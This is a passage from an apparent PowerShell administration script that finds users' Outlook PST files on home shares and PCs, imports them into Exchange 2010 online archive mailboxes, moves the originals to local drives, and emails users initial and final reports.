CAS servers to import the PST files use this function to pick the correct one. Pick the wrong MRServer and the Import will never start - here I pick the an MR Server in the Same AD Site using the CAS as a guide we have dediticated "pst import" CAS servers. We are chosing the One CAS server we have designated to heap many request upon so we don't effect user's normal performance on production CAS servers. .NOTES We have since moved all our live copies of each Archive Mailboxdatabase to the same AD site. It is also possible to skip this step, and let exchange pick a cas server. Depends on how much you are moving and how you feel that will effect your users See "Import-PSTFromShare" #> #--------------------------------------------------------------------- $Return = $null # If ($MBX) { # if (((get-mailboxdatabase $mbx.database.Name).RpcClientAccessServer) -match "^ad01") { # $Return = "cas02.domain.com" # } Else { # $Return = "cas04.domain.com" # } # } # ====> TO DO ==== # you will need to replace this with your cas server # or adjust the code above to pick the correct one $Return = "cas02.domain.com" $Return } Function Get-OutlookEXEVersion () { <# .SYNOPSIS Discover the version of Outlook on a PC .DESCRIPTION Discover the version of Outlook on a PC There are many version and many people do not have a compatible version with Exchange 2010 Archive Mailbox #> param( $ComputerName = $null ) $OL = $Null if($ComputerName) { if (Test-Connection -ComputerName $ComputerName -Quiet -Count 1) { Write-Verbose "Trying $ComputerName" If ( Test-path ('\\\\' + $ComputerName + '\\C$\\Program Files (x86)\\Microsoft Office\\Office14\\outlook.exe')) {# office 2010 (32b) on 64bit Write-Verbose "Office 2010 on 64bit" $OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files (x86)\\Microsoft Office\\Office14\\outlook.exe') } ElseIf (Test-path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office14\\outlook.exe')) { # office 2010 on 32bit Write-Verbose "Office 2010" $OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office14\\outlook.exe') } ElseIf (Test-path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office12\\outlook.exe')) { # office 2007 Write-Verbose "Office 2007" $OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\Office12\\outlook.exe') } Else { #check to see if this is (oh my god!) a 2003 client if (Test-Path ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\OFFICE11\\outlook.exe')) { Write-Verbose "Office 2003" $OL = gci ('\\\\' + $ComputerName + '\\c$\\Program Files\\Microsoft Office\\OFFICE11\\outlook.exe') } Else { Write-Verbose "Can't determine Outlook version [$ComputerName]" } } } Else { Write-Warning "[$ComputerName] is not responding" } } Else { Write-Verbose "missing computername [$ComputerName]" } $OL.VersionInfo.ProductVersion } Function Get-SingleMailboxObject($Name = $null) { <# .SYNOPSIS Return a single mailbox .DESCRIPTION Since we are importing mail and humans can be error prone, make absolutely sure we only get one hit on the requested mailbox #> #----------------------------------------------------------------- $ReturnMBX = $null if ($Name) { $MBX = get-mailbox $Name -EA 0 if (!($MBX.Count)) { # is it less than two? if ($MBX) { # is it more than zero $ReturnMBX = $MBX # Return the one } } } $ReturnMBX } Function New-OnlineArchiveByJob($JobObj = $null) { <# .SYNOPSIS Based on Job information, give user Online PST feature. .DESCRIPTION If this job's user is not enabled for online archive then create one in the smallest database. The smallest DB was determined during the "add-PSTImportQueue" ($JobObj.TargetDB) #> $Return = $false if ($JobObj) { $MBXObj = Get-SingleMailboxObject $JobObj.UserEmail #Write-Verbose "User DisplayName : $($mbxObj).Displayname) Derived from $($JobObj.UserEmail)" # this will either fail, create, or do nothing ;) Enable-Mailbox -Archive -Identity $mbxObj -ArchiveDatabase ($JobObj.TargetDB) -ArchiveName $('Online PST - ' + ($mbxObj).Displayname) -ea 0 # just a buffer sleep -Seconds 5 # Adjust Quota so this user is not prohibited during migration Adjust-Quota $MBXObj # reload to capture changes $MBXObj = Get-SingleMailboxObject $JobObj.UserEmail If ($MBXObj.ArchiveDatabase) { $Return = $true #Write-Verbose "User has Archve!" } Else { $Return = $false #Write-Verbose "User has NO Archve!" } } $Return } Function Test-OutlookClientVersion ($V = $null) { <# .SYNOPSIS Test Oulook.exe version .DESCRIPTION older outlook clients can't see the "Online Archive" so flag those users who need an upgrade 12.0.6550.5000 is the minimum level - buggy 12.0.6607.xxxx is Office 2007 SP3 -- preferred level there are search bugs in earlier versions 14.0.6109.5005 is outlook 14 patched to Nov 8, 2011 14.0.6117.5xxx is patched thru April 2012 -- preferred #> $VOK = $False if($V) { if ($V.Split(".")[0] -eq 14) { # Outlook 2010 (32bit) 14.0.4760.1000 if ($V.Split(".")[2] -ge 4760) {$VOK = $true} } Elseif ($V.Split(".")[0] -eq 12) { # Outlook 2007 (32bit) 12.0.6550.5000 (or above) if ($V.Split(".")[2] -ge 6550) {$VOK = $true} } } $VOK } #============================================================================= # PST File Functions #============================================================================= Function Copy-PSTtoImportShare($Path=$Null, $Dest=$null){ <# .SYNOPSIS copy the pst to our share folder .DESCRIPTION Copy the pst to our share folder using Copy-item in the same local AD site works fine. Using BITS when copying over WAN lines #> $Result = "Fail" # Copied or Error(s) #Write-Verbose "Copy From: $Path To: $Dest" if($Path -and $Dest ) { $NewFile = Copy-Item -Path $Path -Destination $Dest -PassThru if ($NewFile){ $Result = "Copied" } Else { # return the last error $Result = $error[0].Exception Write-Verbose "Copy ResultFrom: $($error[0].Exception)" } } $Result } Function Copy-PSTusingBITS ($JobObj = $null) { <# .SYNOPSIS copy the pst to our share folder .DESCRIPTION Copy the pst to our share folder using Copy-item in the same local AD site works fine. Using BITS when copying over WAN lines #> $Result = $false if ($JobObj) { $params = @{ Source = ($Jobobj.OrgUNCName) Destination = ($Jobobj.TargetUNCName) Description = ("Online PST BITS Copy") DisplayName = ($JobObj.JobName) Asynchronous = $true Priority = "Normal" } $Result = Start-BitsTransfer @params } $Result = $null sleep 2 $Result = Get-BitsTransfer | Where-Object { $_.DisplayName -eq ($ThisJob.JobName) } $Result } Function Get-PSTFileList() { <# .SYNOPSIS Discover PST Files in folders .DESCRIPTION Discover PST Files in folders .NOTES - Some AD objects do not have a home directory - Allowed for some results of *.pst being directories #> param( $Homedir = $null, $PCIP = $null, $SearchPC = $false, $OS = $null, $UN = $null, $SourceDir=$null ) $HDFiles = $null $PCFIles = $null #Write-Verbose "Get-PSTFileList $HomeDir $PCIP $SearchPC $OS $UN" # assuming SourceDir is a specific target dir if(!($SearchPC) -and $SourceDir) { Write-host "`t-> Override HomeDir: $HomeDir to $SourceDir" $Homedir = $SourceDir } If ($Homedir){ if(Test-Path $HomeDir) { Write-Verbose "`t`t-> Searching $HomeDir" # ensure this is an array even if we have only one entry [array]$HDFiles = gci -path $HomeDir -Filter '*.pst' -Recurse -Force -EA 0 | ?{$_.PSIsContainer -eq $false} } } if($SearchPC -and $PCIP) { if(Test-Connection $PCIP -Count 1 -Quiet) { $PCDir = $null if($SourceDir) { $PCDir = $SourceDir } Else { if($OS -match "7") { Write-Verbose "`t`t-> Searching Windows7 PC $UN" $PCDir = $("\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook") } Elseif ($OS -match "XP") { Write-Verbose "`t`t-> Searching WindowsXP PC $UN" $PCDir = $("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN) } Else { #we don't know OS, so test them and see which flies Write-Verbose "`t`t-> OS not known, testing for OS :" if(Test-Path ("\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook")) { Write-Verbose "`t`t-> Try Windows7" $PCDir = "\\\\" + $PCIP + "\\C$\\Users\\" + $UN + "\\AppData\\Local\\Microsoft\\Outlook" } Elseif (Test-Path ("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN)){ Write-Verbose "`t`t-> Try WindowsXP" $PCDir = $("\\\\" + $PCIP + "\\C$\\Documents And Settings\\" + $UN) } Else { Write-Verbose "`t`t-> OS Unknown" $PCDir = $("\\\\" + $PCIP + "\\c$") } } } #if have a legit dir or just the whole c drive ... Write-Verbose "`t`t-> Searching $PCDir" If(Test-Path $PCDir) { [array]$PCFIles = gci -path ($PCDir) -Filter '*.pst' -Recurse -Force -EA 0 | ?{$_.PSIsContainer -eq $false} } } Else { Write-Output ("`t-> $PCIP is not responding.") } } if($HDFiles -and $PCFIles){ $Files = $HDFiles + $PCFIles } Elseif ($HDFiles -and (-not $PCFIles)){ $Files = $HDFiles } Elseif ((-not $HDFiles) -and $PCFIles){ $Files = $PCFIles } Else { $Files = $null } $Files } Function Import-PSTFromShare($JobObj){ <# .SYNOPSIS import into the Archive mailbox .DESCRIPTION import into the Archive mailbox .NOTES We found that 99% of the people wanted to keep their data separate after the import, just like it was in their PST files, so UseTargetRootFolder was defaulted to true in the NEw-PSTJobObject function We check here for false. #> $Return = "Failed" $Error.Clear | Out-Null $MBXName = $JobObj.UserObj $User = $JobObj.UserObj.Split("\\")[1] $File = $JobObj.TargetUNCName $JobName = $JobObj.JobName $CAS = $JobObj.MRServer if ($JobObj.TargetRootFolder) { $Folder = $JobObj.TargetRootFolder } Else { $Folder = $JobObj.OrgFileName } Write-Debug "$MBXName -Name $JobName -Batchname $USER -MRSServer $CAS -TargetDB $JobObj.TargetDB" # import the pst #======= TO DO ============ # remove the -MRSServer $CAS - if you want Exchange to choose the CAS server every time. if($JobObj.UseTargetRootFolder -eq "TRUE") { $PSTQueued = New-MailboxImportRequest -Name $JobName -BatchName $USER -Mailbox "$MBXName" -FilePath "$File" -IsArchive -MRSServer $CAS -BadItemLimit 9999 -AcceptLargeDataLoss -Confirm:$false -targetrootfolder $Folder } Else { $PSTQueued = New-MailboxImportRequest -Name $JobName -BatchName $USER -Mailbox "$MBXName" -FilePath "$File" -IsArchive -MRSServer $CAS -BadItemLimit 9999 -AcceptLargeDataLoss -Confirm:$false } If($PSTQueued) { $Return = $PSTQueued.Status } Else { $Return = $Error[0].ToString() } sleep -Seconds 5 $Return } Function Move-PSTToLocal ($IP=$null, $PSTFiles=$null, $SamAcct=$null, $IgnoreAge=$False) { <# .SYNOPSIS clear PST files off the Home shares .DESCRIPTION The botton line of this project is to clear PST files off the Home shares If the PST file has been imported the file itself has become a backup and as such is safe to put on the local PC of the user. .NOTES Move PSTs If this is a windows 7 box and has 2010 this might be the place to put them \\\\172.18.20.1\\c$\\Users\\<user>\\Documents\\Outlook Files but this is good for XP \\\\172.18.20.1\\c$\\D9ocuments and Settings\\<user>\\My Docuemtns\\Outlok Files If this user is in a far away place, then do NOT push the data back to the PC #> Write-Host "Starting = Who:($SamAcct), Count:($(($PSTFiles).Count)), Computer:($IP)" $HQUser = $true $Region = (get-mailbox $SamAcct).CustomAttribute2 If (($Region -eq "Asia") -or ($Region -eq "Europe")) {$HQUser = $false} if ($IP -eq "None") {$IP = $null} if($IP -and $PSTFIles -and $SamAcct -and $HQUser) { #make sure we can ping the PC Write-Host $("$SamAcct; Starting Move-PSTFiles $(get-date)") $("$SamAcct; Starting Move-PSTFiles $(get-date)") >> $Script:MoveFileLog if (Test-Connection -ComputerName $IP -Quiet){ Write-Host $("$SamAcct; Connect to $IP passed") $("$SamAcct; Connect to $IP passed") >> $Script:MoveFileLog # both return MB $AvailableSpace = [int](get-freediskspace 'c:' $IP)/2 $PSTFiles = $PSTFiles | Sort Length $PSTSize = (($PSTFIles | Measure-Object Length -sum).Sum)/(1024*1024) $OldPSTSize = ((($PSTFIles | ?{$_.LastWriteTime -le (get-date ((get-date).adddays(-90))) } | Measure-Object Length -sum).Sum)/(1024*1024)) $Continue = $false if (Test-Path $('\\\\' + $IP + '\\c$\\users\\' + $SamAcct)) { # Put them in this dir structure, create or use Outlook Files dir $LocalBU = $('\\\\' + $IP + '\\c$\\users\\' + $SamAcct+ '\\Documents\\Outlook Files') if (!(Test-Path $LocalBU)){ mkdir $LocalBU } $Continue = $true Write-Host $("$SamAcct; Connect to $IP passed") $("$SamAcct; LocalBU is $LocalBU") >> $Script:MoveFileLog } Elseif (Test-Path $('\\\\' + $IP + '\\c$\\documents and settings\\' + $SamAcct)) { # Put them in this dir structure, create or use Outlook Files dir $LocalBU = $('\\\\' + $IP + '\\c$\\documents and settings\\' + $SamAcct + '\\Outlook Files') if (!(Test-Path $LocalBU)){ mkdir $LocalBU } $Continue = $true Write-Host $("$SamAcct; LocalBU is $LocalBU") $("$SamAcct; LocalBU is $LocalBU") >> $Script:MoveFileLog } Else { # crap! i give up... #I hope i have the right IP -- log it Write-Host "Can not find a secure directory for $SamAcct" $Continue = $false $("$SamAcct; LocalBU is Can not find a secure directory; Fail") >> $Script:MoveFileLog } if ($Continue) { # move the files $FileNames = @() $PSTFiles | %{ $ThisPST = $_ $FN = $ThisPST.Name $PSTBackups = $LocalBU $FileAge = (((get-date) - ($ThisPST.LastWriteTime)).Days) Write-Host "Working: $FN" Write-Host "(($AvailableSpace) -gt ($PSTSize))" Write-Host "IgnoreAge is $IgnoreAge" if($AvailableSpace -gt $PSTSize) { # there is enough space on the drive to hanlde all the PSTs If($IgnoreAge) { # if we are moving a lot of files, many can be named the same, as in backups and crap like that # so allow by adding a random number to the filename if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){ #rename it in the move $rn = "{0:00}" -f (Get-Random -maximum 10000) [string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1]) $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } Else { # Just Move It Move It $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } } Else { #don't move if younger than 30 days If ($ThisPST.LastWriteTime -le (get-date ((get-date).adddays(-30)))){ #meaning it's older, so move it # if we are moving a lot of files, many can be named the same, as in backups and crap like that # so allow by adding a random number to the filename if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){ #rename it in the move $rn = "{0:00}" -f (Get-Random -maximum 10000) [string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1]) $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } Else { # Just Move It Move It $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct;Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } } Else { # file is too young $("$SamAcct; Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" } } } Else { # there is NOT enough space on the drive to handle all the PSTs # Psts are sorted by smallest to largest so do what you can $AvailableSpace = [int](get-freediskspace 'c:' $IP)/2 $PSTSize = (($ThisPST | Measure-Object Length -sum).Sum)/(1024*1024) If($AvailableSpace -gt $PSTSize) { Write-Host "(($AvailableSpace) -gt ($PSTSize))" If($IgnoreAge) { # if we are moving a lot of files, many can be named the same, as in backups and crap like that # so allow by adding a random number to the filename if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){ #rename it in the move $rn = "{0:00}" -f (Get-Random -maximum 10000) [string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1]) $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } Else { # Just Move It Move It $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } } Else { #don't move if younger than 90 days If ($ThisPST.LastWriteTime -le (get-date ((get-date).adddays(-30)))){ #meaning it's older, so move it # if we are moving a lot of files, many can be named the same, as in backups and crap like that # so allow by adding a random number to the filename if($FileNames -contains $FN -or (Test-Path $($PSTBackups + "\\" + $FN))){ #rename it in the move $rn = "{0:00}" -f (Get-Random -maximum 10000) [string]$FN = $ThisPST.Name.Split(".")[0] + "-" + $RN + "." + ($ThisPST.Name.Split(".")[1]) $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } Else { # Just Move It Move It $PSTBackups = $PSTBackups + "\\" + $FN $("$SamAcct; Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog Write-Host "Age [$($FileAge)] Moving $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)" #Read-Host "Continue" Move-Item -Path $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups) } } Else { # file is too young $("$SamAcct; Age [$($FileAge)] Skipping due to Age<30 $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog } } } Else { $("$SamAcct; Age [$($FileAge)] Skipping due to AvailableSpace $($ThisPST.VersionInfo.Filename) -Destination $($PSTBackups)") >> $Script:MoveFileLog } } $FileNames += $FN } } Else { Write-Host "No Files Moved." $("$SamAcct; No Files Moved.") >> $Script:MoveFileLog } } Else { Write-Host "Computer [$IP] seems dead" $("$SamAcct; Computer [$IP] seems dead.") >> $Script:MoveFileLog } } Else { if (!($PSTFiles)) { Write-Host "No PST Files found." $("$SamAcct; No PST Files found.") >> $Script:MoveFileLog } Else { Write-Host "Bad Parameters or Not CONUS User." $("$SamAcct; Bad Parameters or Not CONUS User.") >> $Script:MoveFileLog } } } #============================================================================= # PST Queue Functions #============================================================================= Function Format-JobStatus($JobObj) { <# .SYNOPSIS Query the queue for info on a particular user. .DESCRIPTION Query the queue for info on a particular user. Count the number of jobs in each status category, incoming JobObj is a collection. #> # # # # $JobsCount = 0 $StatusNew = 0 $StatusCopied = 0 $StatusBITS = 0 $StatusInQueue = 0 $StatusImported = 0 $StatusCleanedup = 0 $StatusNotified = 0 $LastError = $null $JobSize = 0 $StatusSkipped = 0 $JobObj | %{ $ClientOK = $_.ClientVerOK $UName = $_.UserMBX $TargetDB = $_.TargetDB $a = [int]($_.FileSize) $JobSize += $a $skip=$false if(($_.ProcessFile -eq "FALSE")){$Skip=$true} Switch ($_.JobStatus) { New { if(($Skip)){$StatusSkipped++} Else {$StatusNew++} } NewBits { if(($Skip)){$StatusSkipped++} Else {$StatusNew++} } Copied {$StatusCopied++} InBits {$StatusBITS++} InQueue {$StatusInQueue++} Imported {$StatusImported++} CleanedUp {$StatusCleanedup++} Notified {$StatusNotified++} } $JobsCount++ } $StatusEntry = New-Object PSObject $StatusEntry | Add-Member -type NoteProperty -name Name -value ($UName) $StatusEntry | Add-Member -type NoteProperty -name Client -value ($ClientOK) $StatusEntry | Add-Member -type NoteProperty -name Size -value ($JobSize) $StatusEntry | Add-Member -type NoteProperty -name Jobs -value ($JobsCount) $StatusEntry | Add-Member -type NoteProperty -name New -value ($StatusNew) $StatusEntry | Add-Member -type NoteProperty -name Skip -value ($StatusSkipped) $StatusEntry | Add-Member -type NoteProperty -name BITS -value ($StatusBITS) $StatusEntry | Add-Member -type NoteProperty -name Copied -value ($StatusCopied) $StatusEntry | Add-Member -type NoteProperty -name InQue -value ($StatusInQueue) $StatusEntry | Add-Member -type NoteProperty -name Imptd -value ($StatusImported) $StatusEntry | Add-Member -type NoteProperty -name ClndUp -value ($StatusCleanedup) $StatusEntry | Add-Member -type NoteProperty -name Notifd -value ($StatusNotified) $StatusEntry | Add-Member -type NoteProperty -name Target -value ($TargetDB) #$StatusEntry | Add-Member -type NoteProperty -name Errors -value ($LastError) $StatusEntry } Function Get-ArchDB() { <# .SYNOPSIS Find the smallest Archive mailbox database .DESCRIPTION Find the smallest Archive mailbox database, not necesarily the smallest now, but even after all the current jobs are processed #> #get current sizes - include or exclude certain DBs $ArchSize = @{} # get all database that Start with "arch", 3 digits, and end with character "b-z" like "Arch101B" for example # excluding arch102* for now, no more users there... (get-mailboxdatabase |?{$_.name -match 'arch\\d{3}[acdef]' -and $_.name -notmatch 'arch102'} | Get-MailboxDatabase -Status) | %{$ArchSize.Add($_.Name, $_.DatabaseSize.ToMB())} # need to account for pending items... if($OldJobQueue) { $OldJobQueue | %{ $tmp = $ArchSize.item($_.TargetDB) $Tmp += [int]$_.FileSize $ArchSize.remove($_.TargetDB) $ArchSize.add($_.TargetDB, $tmp) } } # return the smallest one ($ArchSize.GetEnumerator() | sort Value)[0].Name } Function Lock-PSTIQ() { <# .SYNOPSIS Signal the queue file is in use by creating a file. .DESCRIPTION Signal the queue file is in use by creating a file. #> if(!(Test-PSTIQLock)) {$a = New-Item $($Script:PSTUNCDir + '\\PSTImportQueue.Lock') -itemtype "file"} } Function New-TargetPSTDirectory($MBX = $null) { <# .SYNOPSIS Create a directory to hold the PST file while they are importing. .DESCRIPTION Create a directory to hold the PST file while they are importing. These psts are deleted at the end, but reports for each PST file are left in the directory. #> $Return = "Error" If ($MBX) { $dir = $Script:PSTShareDir + "\\" + $MBX.samaccountname if(!(Test-Path $dir)) { $newdir = ni -ItemType Directory -Path $dir } Else { $Return = $dir } } #Test new dir and make sure it's there If($newdir) { $Return = (resolve-path $newdir).ProviderPath } $Return } Function Test-PSTIQLock () { <# .SYNOPSIS Test to see if PST Import Queue is in use. .DESCRIPTION Test to see if PST Import Queue is in use. #> Test-Path $($Script:PSTUNCDir + '\\PSTImportQueue.Lock') } Function Unlock-PSTIQ() { <# .SYNOPSIS Remove the lock when the PST Import Queue is no longer in use. .DESCRIPTION Remove the lock when the PST Import Queue is no longer in use. #> if(Test-PSTIQLock) {Remove-Item $($Script:PSTUNCDir + '\\PSTImportQueue.Lock')} } #============================================================================= # Send Notification Functions #============================================================================= Function Send-NotificationInitialReport($JobObj) { <# .SYNOPSIS Send the User a notification of PST files found and the work to be done. .DESCRIPTION Send the User a notification of PST files found and the work to be done. Incoming JobObj will give us the information we needed to the report. #> $AllProcessFiles = $JobObj | ?{$_.ProcessFile -eq $true} $AllSkippedJobs = $JobObj | ?{$_.ProcessFile -ne $true} $JobObj | %{$User = $_.UserMBX; $CLOK = $_.ClientVerOK } Write-Host $User Write-Host $CLOK $Subject = "Requested PST Import: Initial Report for " + $User $From = "EmailTeam@domain.com" $Body = "Note: This process will not delete or alter your original PSTs in any way.`n" if ($JobObj.ClientVer -match "^14.") { $Body = $Body + "Your offline PST files will be copied into your new " + '"Archive - ' + $JogObj.UserEmail + '"' + " folder in Outlook.`n" } Else { $Body = $Body + "Your offline PST files will be copied into your new " + '"Online PST"' + " folder in Outlook.`n" } $Body = $Body + "`n" $Body = $Body + "The copy may take a few nights to complete. The process will start tonight about 7PM (1900). `n" $Body = $Body + "`t- Do not add any messages to your PSTs during this process.`n" $Body = $Body + "`t- Please shut down Outlook before leaving each night.`n" $Body = $Body + "`t- You do not need to turn off your PC.`n" $Body = $Body + "`n" $Body = $Body + "You will be notified when the copies are complete.`n" $Body = $Body + "`n" # you may want to comment this out, or create one of your own #$Body = $Body + "Click below to read the FAQ about Online PSTs." #$Body = $Body + "`n" #$Body = $Body + '"' + 'http://<link to self help doc on sharepoint> #$Body = $Body + "`n" $Body = $Body + "Once you see your new Online PST, use it as you would any PST.`n" $Body = $Body + "`n" $Body = $Body + "The procedure for finding your PST files has finished and found " + $JobObj.Count + " files. The ones scheduled for import, are:`n`n" #location of How to remove password on PST #"`n(http://office.microsoft.com/en-us/outlook-help/remove-a-password-from-a-personal-folders-file-pst-HA001151725.aspx)" if ($AllProcessFiles) { $NUm = 0 $tmp = $null $tmp = "{0,3}`t{1,-25}`t{2}`t`t{3}`n" -f ("Num"),("FileName"),("Size"),("Directory") $Body = $Body + $tmp $AllProcessFiles | %{ $NUm++ $To = $_.UserEmail $temp = '"' + (split-path $_.OrgUNCName) + '"' $temp1 = $_.OrgFileName $tempS = $_.FileSize $tmp = $null $tmp = "{0,3}`t{1,-25}`t({2,7} M)`t{3}`n" -f ($Num),($temp1),($tempS), ($temp) $Body = $Body + $tmp } } Else { $Body = $Body + "(None)" } $Body = $Body + "`n`nSkipped Files: `n" if($AllSkippedJobs) { $NUm = 0 $tmp = $null $tmp = "{0,3}`t{1,6}`t{2,-25}`t{3}`t`t{4}`n" -f ("Num"),("Reason"),("FileName"),("Size"),("Directory") $Body = $Body + $tmp $AllSkippedJobs | %{ $NUm++ $To = $_.UserEmail $temp = '"' + (split-path $_.OrgUNCName) + '"' $temp1 = $_.OrgFileName $tempS = $_.FileSize $skip = $_.SkipReason $tmp = $null $tmp = "{0,3}`t{1,6}`t{2,-25}`t({3,7} M)`t{4}`n" -f ($Num),($skip),($temp1),($tempS),($temp) $Body = $Body + $tmp } } Else { $Body = $Body + "(None)" } $Body = $Body + "`n`n" $Body = $Body + "Files are skipped due to either size (empty file) or not opened by Outlook in the last 2 years.`n" $Body = $Body + "Files also can be skipped if they look like Backups (BU) or Sharepoint Lists (SP).`n" $Body = $Body + "(Skipping files is just a suggestion. You can opt to include them.)`n" if($JobObj.Count){ $Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj)[0].ClientVerOK) + " " + (($JobObj)[0].ClientVer) + "]["+(($JobObj)[0].IP)+"]["+(($JobObj)[0].OSName)+"]" } Else { $Body = $Body + "`n[Run on: " + $(Hostname) + "; Client is " + (($JobObj).ClientVerOK) + " " + (($JobObj).ClientVer) + "]["+(($JobObj).IP)+"]["+(($JobObj).OSName)+"]" } If ($NoNotify) { Send-MailMessage -Body $body -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -To $Script:AdminEmail } Else { Send-MailMessage -Body $body -To $To -From $From -SmtpServer $Script:SMTPServer -Subject $Subject -cc $Script:AdminEmail #Send-MailMessage -Body $body -To $JobObj.UserEmail -From $From -SmtpServer $Script:SMTPServer -Subject $Subject } } Function Send-NotificationFinalReport($JobObj) { <# .SYNOPSIS Send User the Final report detailing the work done. .DESCRIPTION Send User the Final report detailing the work done. #> $AllProcessFiles = $JobObj | ?{$_.ProcessFile -eq "TRUE"} $AllSkippedJobs = $JobObj | ?{$_.ProcessFile -eq "FALSE"} if($JobObj.Count) { $Subject = "Requested PST Import: Final Results for: " + $JobObj[0].UserMBX $ClientVer = $JobObj[0].ClientVer $Email = $($JobObj[0].UserEmail.ToString()) } Else { $Subject = "Requested PST Import: Final Results for: " + $JobObj.UserMBX $ClientVer = $JobObj.ClientVer $Email = $($JobObj.UserEmail.ToString()) } $From = "EmailTeam@domain.com" $Body = "The process for copying your PST files has finished. Please take a few moments to complete the final steps:`n" $Body = $Body + "`n" if ($ClientVer -match "^14." -or $ClientVer -match "Ignore") { $Body = $Body + "`t1. Review messages in the " + '"Archive - ' + $Email + '"' + " folder in Outlook and confirm all have been copied correctly.`n" } Else { $Body = $Body + "`t1. Review messages in the " + '"Online PST"' + " folder in Outlook and confirm all have been copied correctly.`n" } #$Body = $Body + "`t1. Review messages in the " + '"Online PST - <yourname>" or "Archive - <yourname>"' + " folder in Outlook and confirm all have been copied correctly.`n" $Body = $Body + "`t2. Disconnect the old PSTs from Outlook. (right click the name and choose: Close <pstname>)`n" $Body = $Body + "`t3. Restart Outlook - to release the lock on the file.`n" $Body = $Body + "`t4. Move the old PST files from your Home Drive (H:\\) to a local drive. This will improve your Outlook performance!`n" $Body = $Body + "`t (For example, create a directory in " + '"My Documents"' + " called " + '"Outlook Files"' + " and move the files listed below from your H:\\ to the new Outlook Files directory.)`n" if ($ClientVer -match "^14." -or $ClientVer -match "Ignore") { $Body = $Body + "`t5. Begin storing messages in your " + '"Archive - ' + $Email + '"' + " folder instead of your old PSTs.`n" } Else { $Body = $Body + "`t5. Begin storing messages in your " + '"Online PST"' + " folder instead of your old PSTs.`n" } #$Body = $Body + "`n`tFor detailed instructions, click this link:`n" #$Body = $Body + "`n`t" + '"http://<sharepointsite>/Self-Help/Standard Application Issues/How do I Disconnect My Personal Folders.pdf"' + "`n" #$Body = $Body + "`n" $Body = $Body + "`tNote: Remember you can read your old PSTs at any time. In a few days you will not be able to add any new emails to these old PST files.`n" $Body = $Body + "`t You are now using the Online PST instead.`n" $Body = $Body + "`n" $Body = $Body + 